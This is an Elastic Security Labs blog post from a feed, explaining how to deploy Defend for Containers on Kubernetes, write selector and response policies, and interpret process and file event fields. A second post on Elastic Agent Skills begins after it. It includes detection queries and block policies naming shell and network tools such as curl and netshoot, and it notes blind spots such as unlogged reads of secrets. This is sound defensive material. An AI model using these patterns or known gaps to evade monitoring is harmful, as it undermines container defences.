<p>An important note to be aware of is: “<em>Note that the following manifest contains resource limits that may not be appropriate for a production environment. Review our guide on <a href="https://www.elastic.co/docs/reference/fleet/scaling-on-kubernetes#_specifying_resources_and_limits_in_agent_manifests">Scaling Elastic Agent on Kubernetes</a> before deploying this manifest.</em>”</p>
<p>You will need to include the following <code>capabilities</code> under <code>securityContext</code> in your Kubernetes YAML for the service to work:</p>
<pre><code class="language-yaml">securityContext:
    runAsUser: 0
    capabilities:
      add:
        - BPF ## Enables both BPF &amp; eBPF
        - PERFMON
        - SYS_RESOURCE
</code></pre>
<p>After copying or downloading the provided <code>elastic-agent-managed-kubernetes.yml</code> manifest, you can edit the manifest as needed, and apply the manifest with:</p>
<pre><code class="language-bash">kubectl apply -f elastic-agent-managed-kubernetes.yml
</code></pre>
<p>As also mentioned in the manifest, review the guide “<a href="https://www.elastic.co/docs/reference/fleet/running-on-kubernetes-managed-by-fleet">Run Elastic Agent on Kubernetes managed by Fleet</a>” for more deployment information.</p>
<p>Wait for the Elastic Agent pods to schedule and for data to begin flowing into Elasticsearch.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image16.png" alt="Figure 4: Defend for Containers integration input overview" title="Figure 4: Defend for Containers integration input overview" /></p>
<p>Once deployed, Elastic Agent will establish a connection to Fleet, enroll under the selected policy, and begin emitting Defend for Containers telemetry that Elastic Security can consume.</p>
<p>In the next section, we will take a look at the integration configuration options and explore which features are available to use.</p>
<h3>Defend for Containers policies</h3>
<p>At the heart of Defend for Containers' configuration is the policy. Policies determine what activity to observe and how to respond when matching events occur. Policies are composed of two fundamental building blocks:</p>
<ul>
<li><strong>Selectors:</strong> define which events are of interest by specifying operations and conditions;</li>
<li><strong>Responses:</strong> define what actions to take when a selector’s conditions are met.</li>
</ul>
<p>Defend for Containers policies can be edited before deployment or modified post-deployment via the Elastic Security UI’s policy editor.</p>
<h4>Policy structure</h4>
<p>Each policy must contain at least one selector and at least one response. A typical selector specifies one or more operations (such as process events or file activities) and uses conditions (like container image name, namespace, or pod label) to narrow the scope. Responses reference selectors and indicate what action to take when events match.</p>
<p>The default Defend for Containers policy includes two selector-response pairs: “Threat Detection” and “Drift Detection &amp; Prevention”.</p>
<p><strong>Threat detection:</strong> A <code>selector</code> named <code>allProcesses</code> matches all <code>fork</code> and <code>exec</code> events from containers.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image13.png" alt="Figure 5: Defend for Containers allProcesses selector" title="Figure 5: Defend for Containers allProcesses selector" /></p>
<p>And the associated <code>response</code> has the action set to <code>Log</code>, ensuring that events are ingested and can be analyzed.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image11.png" alt="Figure 6: Defend for Containers allProcesses log response" title="Figure 6: Defend for Containers allProcesses `log` response" /></p>
<p><strong>Drift detection &amp; prevention:</strong> A selector named <code>executableChanges</code> matches <code>createExecutable</code> and <code>modifyExecutable</code> operations.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image7.png" alt="Figure 7: Defend for Containers executableChanges selector" title="Figure 7: Defend for Containers executableChanges selector" /></p>
<p>And the response is configured to create alerts (and can be modified to block those operations).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image18.png" alt="Figure 8: Defend for Containers executableChanges alert response" title="Figure 8: Defend for Containers executableChanges `alert` response" /></p>
<p>These can be modified via the UI, but under the hood, these policies are simple YAML configuration files that can be edited directly and used in any CI/CD flow:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: allProcesses
      operation:
        - fork
        - exec
  responses:
    - match:
        - allProcesses
      actions:
        - log
file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - alert
</code></pre>
<p>Next, we will take a look at some example selectors and responses and discuss the options you have for setting up the integration to your liking.</p>
<p><strong>Example selector snippet</strong></p>
<p>Selectors allow fine-grained matching using conditions on fields such as:</p>
<ul>
<li><code>containerImageFullName</code>: full image names like <code>docker.io/nginx</code>;</li>
<li><code>containerImageName</code>: partial image names;</li>
<li><code>containerImageTag</code>: specific tags like <code>latest</code>;</li>
<li><code>kubernetesClusterId</code>: Kubernetes cluster IDs;</li>
<li><code>kubernetesClusterName</code>: Kubernetes cluster names;</li>
<li><code>kubernetesNamespace</code>: namespaces where the workload runs;</li>
<li><code>kubernetesPodName</code>: pod names, with support for trailing wildcards;</li>
<li><code>kubernetesPodLabel</code>: label key/value pairs, with wildcard support.</li>
</ul>
<pre><code class="language-yaml">file:
  selectors:
    - name: nodeExports
      operation:
        - createExecutable
        - modifyExecutable
      containerImageName:
        - &quot;nginx&quot;
      kubernetesNamespace:
        - &quot;prod-*&quot;
</code></pre>
<p>In this example, the selector named <code>nodeExports</code> matches file events that create or modify executables within containers whose image names contain <code>nginx</code> and whose Kubernetes namespace begins with <code>prod-</code>.</p>
<p><strong>Example response snippet</strong></p>
<p>Responses determine what happens when selector conditions are met. Common actions include:</p>
<ul>
<li><code>log</code>: send the event as telemetry for analysis;</li>
<li><code>alert</code>: create an alert in Elastic Security;</li>
<li><code>block</code>: prevent the operation (for supported types).</li>
</ul>
<pre><code class="language-yaml">responses:
  - match:
      - nodeExports
    actions:
      - alert
      - block
</code></pre>
<p>Here, the response references the previously defined <code>nodeExports</code> selector and will both generate an alert and block the matching operation.</p>
<h4>Wildcards and matching</h4>
<p>Selectors in Defend for Containers support trailing wildcards in string-based conditions (such as pod names or image tags). This allows broad matching without enumerating every possible value. For example, a pod selector of <code>backend-*</code> will match all pods whose names begin with <code>backend-</code>, while a label condition such as <code>role:api*</code> matches label values that start with <code>api</code>.</p>
<p>This wildcarding is essential in dynamic environments where workloads scale and shift rapidly.</p>
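<p>For instance, the pod-name and label patterns above could be combined into a single selector along these lines (the selector name is illustrative):</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: backendApiExecs
      operation:
        - exec
      kubernetesPodName:
        - &quot;backend-*&quot;
      kubernetesPodLabel:
        - &quot;role:api*&quot;
</code></pre>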
<p>In addition to simple string matching, Defend for Containers selectors also support <strong>path-based wildcard semantics</strong> when matching file paths. Consider the following selector example:</p>
<pre><code class="language-yaml">- name: pathExamples
  targetFilePath:
    - /usr/bin/echo
    - /usr/sbin/*
    - /usr/local/**
</code></pre>
<p>In this example:</p>
<ul>
<li><code>/usr/bin/echo</code> matches only the <code>echo</code> binary at that exact path.</li>
<li><code>/usr/sbin/*</code> matches everything that is a direct child of <code>/usr/sbin</code>.</li>
<li><code>/usr/local/**</code> matches everything recursively under <code>/usr/local</code>, including paths such as <code>/usr/local/bin/something</code>.</li>
</ul>
<p>These distinctions make it possible to precisely scope file-based selectors, balancing coverage and noise. In practice, they allow detection engineers to target specific binaries, entire directories, or deep directory trees, depending on the use case, without resorting to overly permissive rules.</p>
<h4>Tying it all together</h4>
<p>Up to this point, we have looked at Defend for Containers selectors, wildcard semantics, event types, and how they surface attacker behavior at runtime. The final step is to understand how these pieces come together within a policy to express real detection logic.</p>
<p>Consider the following policy fragment:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: binDirExeMods
      operation:
        - createExecutable
        - modifyExecutable
      targetFilePath:
        - /usr/bin/**
    - name: etcFileChanges
      operation:
        - createFile
        - modifyFile
        - deleteFile
      targetFilePath:
        - /etc/**
    - name: nginx
      containerImageName:
        - nginx

  responses:
    - match:
        - binDirExeMods
        - etcFileChanges
      exclude:
        - nginx
      actions:
        - alert
        - block
</code></pre>
<p>This policy defines three selectors. Two selectors (<code>binDirExeMods</code> and <code>etcFileChanges</code>) describe file system activity of interest, while the third selector (<code>nginx</code>) describes a container context to exclude.</p>
<p>The response section ties these selectors together. The selectors listed under <code>match</code> are logically <code>OR</code>’d, meaning that <em>either</em> condition is sufficient to trigger the response. The selector listed under <code>exclude</code> acts as a logical <code>NOT</code>, removing matching events when the container image is <code>nginx</code>.</p>
<p>Read in plain language, the policy expresses the following logic:</p>
<p><em>If an executable is created or modified anywhere under <code>/usr/bin</code>, <strong>or</strong> a file is created, modified, or deleted under <code>/etc</code>, <strong>and</strong> the activity does not originate from an <code>nginx</code> container, then generate an alert and block the action.</em></p>
<p>In Boolean form, this can be expressed as:</p>
<pre><code class="language-text">IF (binDirExeMods OR etcFileChanges) AND NOT nginx
→ alert + block
</code></pre>
<p>This is where Defend for Containers policies become powerful. Rather than writing complex detection logic in a query language, selectors let you decompose behavior into small, reusable building blocks and then combine them declaratively. By mixing path-based selectors, operation types, container context, and exclusions, you can express nuanced detection logic that remains readable and maintainable.</p>
<p>In practice, this model allows detection engineers to translate threat hypotheses directly into policy logic: <em>what</em> behavior matters, <em>where</em> it occurs, <em>in which workloads</em>, and <em>what should happen</em> when it does.</p>
<h4>Policy validation and refinement</h4>
<p>Once a policy is deployed, it is critical to validate it against real workload behavior before enabling aggressive responses such as blocking. Policies that are too restrictive can disrupt normal container operations; policies that are too permissive may let unwanted activity go unnoticed.</p>
<p>A recommended workflow is:</p>
<ol>
<li>Deploy the default policy in monitoring mode (e.g., with selectors logging events).</li>
<li>Observe the events that appear in Elasticsearch to understand normal workload patterns.</li>
<li>Incrementally tighten selectors and responses, moving from <em>log only</em> → <em>alert</em> → <em>block</em>, testing at each stage.</li>
<li>Use a staging or test cluster to validate blocking behaviors before applying them in production.</li>
</ol>
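<p>As a sketch of step 1, the default drift-detection pair can be run in a log-only mode by downgrading its response action, then tightened to <code>alert</code> and eventually <code>block</code> once the baseline is understood:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - log  # after validation: alert, then alert + block
</code></pre>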
<h3>Defend for Containers Beta limitations</h3>
<p>As of writing, Defend for Containers is available as a Beta integration, and its current capabilities and platform support reflect that status.</p>
<p>Defend for Containers formally supports Amazon EKS and Google GKE. While the integration can be deployed on Azure AKS, this configuration is not officially supported. In particular, AKS deployments currently lack file event telemetry, which limits detection coverage for file-based attack techniques in those environments.</p>
<p>The current Beta also does not capture network events. As a result, detections related to outbound connections, lateral network movement, or data exfiltration must rely on complementary data sources, such as the <a href="https://www.elastic.co/docs/reference/integrations/network_traffic">Network Packet Capture integration</a> or <a href="https://www.elastic.co/beats/packetbeat">Packetbeat</a>, rather than on Defend for Containers telemetry alone.</p>
<p>For file activity, Defend for Containers intentionally logs file open events only when a file is opened with write intent. This design choice reduces noise and focuses on behavior that modifies the system state. However, it also means that read-only access to sensitive files, such as secret discovery, configuration scraping, or failed access attempts, is not currently observable.</p>
<p>This limitation impacts detection use cases such as:</p>
<ul>
<li>Searching and reading Kubernetes service account tokens,</li>
<li>Scanning for <code>.env</code> files or credential material.</li>
</ul>
<p>These are areas where future Defend for Containers iterations may provide more granular telemetry to support advanced detection engineering use cases.</p>
<h3>Enabling the Defend for Containers pre-built detection rules</h3>
<p>Defend for Containers ships with a set of pre-built detection rules that provide baseline coverage for common container attack techniques. Once the integration is enabled, these rules can be activated directly from Elastic Security without additional configuration.</p>
<p>Enabling the pre-built rules is recommended as a starting point, as they are designed to align with Defend for Containers' runtime telemetry and cover execution, file modification, persistence, and post-compromise behavior inside containers. From there, the rules can be extended or refined to match environment-specific workloads and threat models.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image17.png" alt="Figure 9: Defend for Containers pre-built detection rule installation based on tag" title="Figure 9: Defend for Containers pre-built detection rule installation based on tag" /></p>
<p>By filtering for “Data Source: Elastic Defend for Containers”, you can find all rules associated with this integration.</p>
<p><strong>Note:</strong> if you do not see any rules appear, make sure your stack is running version 9.3.0 or later, as these rules are deployed only on 9.3.0+.</p>
<p>With all important Beta limitations mapped, the integration deployed, the pre-built detection rules installed and enabled, and a working policy in place, the next step is to explore the event semantics Defend for Containers produces, including fields commonly used in detection logic, performance considerations, and how these events differ from Elastic Defend events.</p>
<h2>Analyzing Defend for Containers events</h2>
<p>Now that Defend for Containers is deployed and policies are in place, the next step is understanding the events it generates. Similar to working with Elastic Defend or Auditd Manager, Defend for Containers telemetry becomes far more valuable once you develop a mental model of how events are structured and which fields are most relevant for detection engineering.</p>
<p>Defend for Containers produces multiple event types, most notably process events and file events, each enriched with container, host, and orchestration context. While the underlying signals remain rooted in Linux behavior, the additional Kubernetes and container metadata enable you to reason about activity in ways not possible with host-only telemetry.</p>
<p>The following sections walk through the most important field groups and event types, using real Defend for Containers events as reference points.</p>
<h3>Common fields</h3>
<p>Before diving into specific event categories, it is useful to understand the fields that consistently appear across Defend for Containers telemetry. These fields provide the contextual glue that ties individual runtime actions back to policies, selectors, and the underlying execution points inside the kernel.</p>
<p>While process and file events differ in their details, the fields described below are present across Defend for Containers data streams and are often the first place to look when validating detections or troubleshooting policy behavior.</p>
<h4>Defend for Containers-specific context</h4>
<p>Defend for Containers adds several fields specific to how events are collected and policies are applied.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image10.png" alt="Figure 10: Defend for Containers’ important cloud_defend.* fields overview" title="Figure 10: Defend for Containers’ important `cloud_defend.*` fields overview" /></p>
<p>The <code>cloud_defend.hook_point</code> field indicates where in the kernel the event was captured. In the example shown, values such as <code>tracepoint__sched_process_fork</code> and <code>tracepoint__sched_process_exec</code> reveal that the event was generated from kernel tracepoints associated with process creation and execution.</p>
<p>The <code>cloud_defend.matched_selectors</code> field shows which selectors in the active policy matched the event. In the example, the value <code>allProcesses</code> indicates that this event matched a broad selector that captures all process activity. When tuning policies or investigating alerts, this field is essential for understanding <em>why</em> an event was captured.</p>
<p>The <code>cloud_defend.package_policy_id</code> and <code>cloud_defend.package_policy_revision</code> fields tie the event back to a specific Elastic Agent policy and its revision. This makes it possible to correlate events with configuration changes over time and to verify which version of a policy was active when the event occurred.</p>
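<p>These fields make policy tuning concrete: a simple KQL filter such as the following (the dataset and selector name here are examples) isolates exactly the events a given selector produced:</p>
<pre><code class="language-text">event.dataset : &quot;cloud_defend.file&quot; and cloud_defend.matched_selectors : &quot;executableChanges&quot;
</code></pre>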
<h4>Event metadata</h4>
<p>Defend for Containers events follow the <a href="https://www.elastic.co/docs/reference/ecs">Elastic Common Schema</a> conventions and include standard event metadata that describes the activity's type and lifecycle.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image2.png" alt="Figure 11: Defend for Containers’ important event.* fields overview" title="Figure 11: Defend for Containers’ important `event.*` fields overview" /></p>
<p>The <code>event.category</code> field identifies the high-level type of activity, such as <code>process</code> or <code>file</code>, and is typically the first field used when filtering Defend for Containers data. The <code>event.action</code> field describes what occurred, for example, <code>fork</code> or <code>exec</code> for process activity, or <code>open</code>, <code>creation</code>, <code>modification</code>, and <code>deletion</code> for file events.</p>
<p>The <code>event.type</code> field adds lifecycle context, such as <code>start</code> for process execution, and is often used together with <code>event.action</code> to distinguish different phases of activity. The <code>event.dataset</code> field indicates the originating Defend for Containers data stream, such as <code>cloud_defend.process</code>, which is useful when building dataset-scoped queries or detections.</p>
<p>Additional metadata fields like <code>event.id</code>, <code>event.ingested</code>, and <code>event.kind</code> are primarily used for correlation, ordering, and troubleshooting rather than detection logic.</p>
<h4>Host information</h4>
<p>Defend for Containers events include full host context, similar to Elastic Defend and Auditd Manager. This makes it possible to correlate container runtime activity back to the underlying Kubernetes node.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image9.png" alt="Figure 12: Defend for Containers’ important host.* fields overview" title="Figure 12: Defend for Containers’ important `host.*` fields overview" /></p>
<p>The <code>host.name</code> field identifies the node on which the container is running, while <code>host.os.*</code> provides operating system details such as distribution and kernel version. The <code>host.architecture</code> field indicates the CPU architecture, which can be relevant when analyzing binary execution or kernel-specific behavior.</p>
<p>One particularly useful field is <code>host.pid_ns_ino</code>, which identifies the PID namespace. This field allows container activity to be correlated with host-level process and kernel telemetry, and is especially valuable when investigating container escape attempts or node-level impact.</p>
<p>This host context is critical when analyzing cloud-native attacks, as multiple containers often share the same host and kernel, and a container's runtime behavior can have implications beyond its boundaries.</p>
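<p>In practice, this enables simple investigative pivots. The KQL sketch below uses a hypothetical node name and namespace inode value; the point is the pivot on <code>host.pid_ns_ino</code>, not the literals:</p>
<pre><code>host.name : &quot;k8s-node-01&quot; and host.pid_ns_ino : 4026532201
</code></pre>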
<h4>Container and orchestrator context</h4>
<p>Defend for Containers' primary strength lies in its container awareness. Every runtime event is enriched with container and orchestration metadata, allowing activity to be analyzed in the context of <em>what</em> is running, <em>where</em> it is running, and <em>with which</em> privileges.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image8.png" alt="Figure 13: Defend for Containers’ important container.* fields overview" title="Figure 13: Defend for Containers’ important `container.*` fields overview" /></p>
<p>At the container level, fields such as <code>container.id</code> and <code>container.name</code> uniquely identify the running container, while <code>container.image.name</code>, <code>container.image.tag</code>, and the image hash provide visibility into the workload’s origin and version. This is especially useful for distinguishing between expected utility images and unexpected or ad hoc workloads.</p>
<p>A key field for risk assessment is <code>container.security_context.privileged</code>. This field explicitly indicates whether a container is running in privileged mode. When privileged execution is combined with other signals such as interactive shells or broad Linux capabilities, the risk profile of any detected activity increases significantly.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image3.png" alt="Figure 14: Defend for Containers’ important orchestrator.* fields overview" title="Figure 14: Defend for Containers’ important `orchestrator.*` fields overview" /></p>
<p>Defend for Containers also enriches events with orchestration context. Fields such as <code>orchestrator.cluster.name</code>, <code>orchestrator.namespace</code>, and <code>orchestrator.resource.name</code> (typically the Pod name) tie runtime behavior back to Kubernetes workloads. Labels exposed via <code>orchestrator.resource.label</code> further allow detections to incorporate workload intent and ownership.</p>
<p>For detection engineering, this context enables precise scoping of detections to:</p>
<ul>
<li>specific namespaces (for example, <code>kube-system</code>),</li>
<li>privileged or high-risk containers,</li>
<li>workloads with sensitive labels,</li>
<li>or known utility images such as <code>netshoot</code>, <code>kubectl</code>, or <code>curl</code>.</li>
</ul>
<p>This layer of enrichment allows container-aware detection logic to be expressed directly, without having to infer intent indirectly from filesystem paths, cgroups, or namespace identifiers.</p>
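<p>As a hedged KQL sketch (not a shipped rule), scoping to privileged containers running known utility images could look like:</p>
<pre><code>event.category : &quot;process&quot; and container.security_context.privileged : true
  and container.image.name : (&quot;netshoot&quot; or &quot;kubectl&quot; or &quot;curl&quot;)
</code></pre>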
<h3>Process events</h3>
<p>Process execution is one of the most important signal types that Defend for Containers provides. Process events capture <code>fork</code>, <code>exec</code>, and <code>end</code> activities within containers and expose detailed lineage information critical to understanding how execution unfolds at runtime.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image12.png" alt="Figure 15: Defend for Containers’ important process.* fields overview" title="Figure 15: Defend for Containers’ important `process.*` fields overview" /></p>
<p>Several fields are particularly important for detection engineering. The combination of <code>process.name</code> and <code>process.executable</code> identifies what was executed and from where, while <code>process.args</code> provides insight into how it was invoked. Fields such as <code>process.pid</code>, <code>process.start</code>, <code>process.end</code>, and <code>process.exit_code</code> describe the process lifecycle and are useful for timing analysis and execution-flow reconstruction. The <code>process.entity_id</code> provides a stable identifier that allows processes to be tracked across multiple related events.</p>
<p>Defend for Containers also captures rich ancestry information. Fields under <code>process.parent.*</code> describe the immediate parent process, making it possible to detect suspicious parent–child relationships such as shells spawned by unexpected binaries. In addition, <code>process.entry_leader.*</code> and <code>process.session_leader.*</code> provide higher-level anchors within the process tree.</p>
<p>Much like Elastic Defend, Defend for Containers models processes as a graph rather than isolated events. The entry leader is especially useful in container environments, as it often represents the initial process launched by the container runtime (for example, <code>containerd</code>, <code>runc</code>, or a shell specified as the container entrypoint). Anchoring detections to the entry leader allows process trees to be interpreted consistently, even when containers spawn many short-lived child processes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image15.png" alt="Figure 16: Defend for Containers’ important process.session* fields overview" title="Figure 16: Defend for Containers’ important `process.session*` fields overview" /></p>
<p>Session leader fields provide additional context about interactive execution and session boundaries, helping distinguish background services from interactive or attacker-driven activity.</p>
<p>Together, these fields make it possible to express detection logic that goes beyond single executions and instead reasons about execution chains, lineage, and intent, which is essential for detecting real-world container attack techniques.</p>
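<p>For example, a suspicious parent–child relationship can be sketched in EQL. This is an illustration built on the fields described above, not a production rule; the parent allowlist is an assumption:</p>
<pre><code>// Shell spawned inside a container by something other than the expected runtime
process where event.action == &quot;exec&quot; and process.name in (&quot;bash&quot;, &quot;sh&quot;)
  and process.parent.name not in (&quot;containerd-shim&quot;, &quot;runc&quot;)
</code></pre>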
<h4>Capabilities and privilege context</h4>
<p>One of the more powerful aspects of the Defend for Containers process events is the inclusion of Linux capability information. For each process, Defend for Containers exposes both the effective and permitted capability sets via:</p>
<ul>
<li><code>process.thread.capabilities.effective</code></li>
<li><code>process.thread.capabilities.permitted</code></li>
</ul>
<p>These fields describe what a process is actually allowed to do at runtime, independent of its user ID or container boundary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image14.png" alt="Figure 17: Defend for Containers’ important process.thread.capabilities.* fields overview" title="Figure 17: Defend for Containers’ important `process.thread.capabilities.*` fields overview" /></p>
<p>In privileged containers, processes often expose a broad set of effective capabilities, including highly sensitive ones such as <code>CAP_SYS_ADMIN</code>, <code>CAP_SYS_MODULE</code>, <code>CAP_SYS_PTRACE</code>, <code>CAP_SYS_RAWIO</code>, and <code>CAP_BPF</code>. The presence of these capabilities significantly changes the risk profile of any executed command, as they enable actions that can directly impact the host kernel or other workloads.</p>
<p>From a detection engineering perspective, this context is critical. It allows detections to move beyond simple process-name matching and instead reason about <em>impact</em>. The same binary execution can have vastly different implications depending on whether it runs with a minimal capability set or with near-host-level privileges.</p>
<p>In practice, capability data enables detection engineers to:</p>
<ul>
<li>Identify suspicious tooling executed inside overly permissive containers.</li>
<li>Correlate runtime behavior with dangerous capability combinations.</li>
<li>Prioritize alerts based on actual exploitation potential rather than surface-level activity.</li>
</ul>
<p>This becomes especially relevant to container breakout research, where the presence or absence of specific capabilities often determines whether an exploit is viable.</p>
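<p>As a hedged KQL illustration, capability context can be folded directly into an execution query (the capability list here is illustrative):</p>
<pre><code>event.category : &quot;process&quot; and event.action : &quot;exec&quot;
  and process.thread.capabilities.effective : (&quot;CAP_SYS_ADMIN&quot; or &quot;CAP_SYS_MODULE&quot; or &quot;CAP_SYS_PTRACE&quot;)
</code></pre>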
<h4>Interactive execution</h4>
<p>The <code>process.interactive</code> field indicates whether a process is associated with an interactive session. In container environments, interactive execution is relatively rare for production workloads and often correlates strongly with post-compromise or hands-on-keyboard activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image4.png" alt="Figure 18: Defend for Containers’ important process.*.interactive fields overview" title="Figure 18: Defend for Containers’ important `process.*.interactive` fields overview" /></p>
<p>Defend for Containers exposes interactivity not only at the process level, but also across related execution contexts, including <code>process.parent.interactive</code>, <code>process.entry_leader.interactive</code>, and <code>process.session_leader.interactive</code>. This makes it possible to determine whether an entire execution chain is interactive, rather than relying on a single process flag in isolation.</p>
<p>Common examples of interactive execution within containers include spawning a <code>bash</code> or <code>sh</code> shell, running interactive utilities such as <code>curl</code>, <code>kubectl</code>, or <code>busybox</code>, or operator-driven reconnaissance within a compromised Pod. While these actions may be legitimate during debugging, they are uncommon in steady-state production workloads.</p>
<p>When combined with container image, namespace, and privilege context, interactive execution becomes a strong anomaly signal. It allows detection logic to distinguish between expected automated container behavior and activity more consistent with manual intervention or attacker-driven exploration.</p>
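<p>A minimal KQL sketch of that combination (the namespace exclusions are placeholders for whatever is expected in your environment):</p>
<pre><code>event.category : &quot;process&quot; and process.interactive : true
  and process.name : (&quot;bash&quot; or &quot;sh&quot;)
  and not orchestrator.namespace : (&quot;dev&quot; or &quot;debug&quot;)
</code></pre>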
<h3>File events</h3>
<p>Defend for Containers file events capture filesystem activity inside containers, and are emitted for a variety of operations. Unlike traditional file integrity monitoring, these events are runtime-aware and scoped to container workloads, providing context about <em>how</em> and <em>why</em> file changes occur.</p>
<p>Defend for Containers can detect file activity such as file opens <strong>with write intent</strong>, content modifications, file creations, renames, permission changes, and deletions. By focusing on write-oriented operations, Defend for Containers emphasizes behavior that alters system state rather than passive file access.</p>
<p>This allows detection engineers to reason about file usage patterns at runtime, not just the result of a change.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image6.png" alt="Figure 19: Defend for Containers’ important file events overview" title="Figure 19: Defend for Containers’ important `file` events overview" /></p>
<p>Several fields are particularly important when building file-based detections. The <code>file.path</code> and <code>file.name</code> fields identify the affected file and its location, while <code>file.extension</code> can help distinguish binaries, scripts, and configuration files. The <code>event.action</code> and <code>event.type</code> fields describe what operation occurred and how it should be interpreted in the event lifecycle.</p>
<p>Together, these fields allow Defend for Containers to distinguish benign file access from suspicious modification patterns, such as writing binaries or changing permissions within sensitive directories.</p>
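<p>For instance, a hedged KQL sketch of a write-oriented detection; the path is an assumed example of a sensitive directory:</p>
<pre><code>event.category : &quot;file&quot; and event.action : (&quot;creation&quot; or &quot;modification&quot;)
  and file.path : /usr/bin/*
</code></pre>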
<h3>Bringing it together</h3>
<p>As with any other data source, Defend for Containers telemetry becomes truly valuable once you understand how to combine fields across the process, file, container, and orchestration domains. Rather than relying on static indicators, Defend for Containers enables detection engineering based on runtime behavior, privilege context, and workload identity.</p>
<h2>Conclusion</h2>
<p>Defend for Containers in Elastic Stack 9.3.0 establishes container runtime detection as a core component of Linux detection engineering. It features a clear scope, a policy-driven configuration model, and runtime telemetry designed specifically for containerized workloads.</p>
<p>In this post, we examined how to deploy Defend for Containers, how its policy model is structured, and how runtime events are generated and enriched with container and orchestration context. We explored the structure of process and file events, capability metadata, interactive execution signals, and container-specific fields that allow detections to be expressed in a workload-aware manner.</p>
<p>The key takeaway is that effective container detection requires reasoning about runtime behavior in context: processes, file modifications, privileges, and workload identity must be evaluated together. Defend for Containers provides the necessary telemetry to make that possible.</p>
<p>In the next article, we will build on this foundation by walking through a realistic container attack scenario and demonstrating how Defend for Containers telemetry surfaces each stage of compromise in practice.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/getting-started-with-defend-for-containers.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Get started with Elastic Security from your AI agent]]></title>
            <link>https://www.elastic.co/security-labs/agent-skills-elastic-security</link>
            <guid>agent-skills-elastic-security</guid>
            <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Go from zero to a fully populated Elastic Security environment without leaving your IDE, using open source Agent Skills.]]></description>
            <content:encoded><![CDATA[<h2>Get started with Elastic Security from your AI agent</h2>
<p><a href="https://github.com/elastic/agent-skills/tree/main">Elastic Agent Skills</a> are open source packages that give your AI coding agent native Elastic expertise. If you're already using <a href="https://www.elastic.co/security-labs/from-alert-fatigue-to-agentic-response">Elastic Agent Builder</a>, you get AI agents that work natively with your security data. Agent Skills are for the other side: bringing that same Elastic Security knowledge to the external AI tools your team already uses, like Cursor, Claude Code, or GitHub Copilot.</p>
<p>If you use an AI coding agent and want to evaluate Elastic Security, or you're a security team that wants to get up and running with Elastic Security fast without navigating setup docs, these are for you. Today we're shipping security skills that take you from zero to a fully populated Elastic Security environment, without leaving your integrated development environment (IDE).</p>
<p>Before you dive in, note that this is a v0.1.0 release. Also, review <a href="https://github.com/elastic/agent-skills/blob/main/README.md">this documentation</a> for steps to get started and important security considerations.</p>
<h3>Step 1: Create a security project</h3>
<p>You open your AI coding agent and prompt: <em>Create a Security project on Elastic Cloud.</em></p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/cloud/create-project"><code>create-project</code></a> skill provisions an Elastic Cloud Serverless Security project via the Elastic Cloud API, handles credentials securely, and hands you back your Elasticsearch and Kibana URLs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image1.png" alt="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." title="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." /></p>
<p>Elastic Cloud Serverless supports regions across Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, so you can pick whichever fits your environment.</p>
<p>One prompt. Project ready.</p>
<h3>Step 2: Generate sample data</h3>
<p>An empty Elastic Security project isn't very convincing. No alerts, no timelines, no process trees. You need data, but you don't always want to connect real data sources before you've had a chance to explore.</p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/generate-security-sample-data"><code>generate-security-sample-data</code></a> skill populates your project with realistic, Elastic Common Schema–compliant (ECS-compliant) security events and synthetic alerts across four attack scenarios:</p>
<ul>
<li><strong>Windows ransomware chain:</strong> Word macro to PowerShell to ransomware deployment, complete with process trees that light up the Analyzer view.</li>
<li><strong>Credential access:</strong> LSASS memory dumps and credential harvesting.</li>
<li><strong>AWS cloud privilege escalation:</strong> IAM policy manipulation and unauthorized access key creation.</li>
<li><strong>Okta identity attack:</strong> Multifactor authentication (MFA) factor deactivation and suspicious authentication patterns.</li>
</ul>
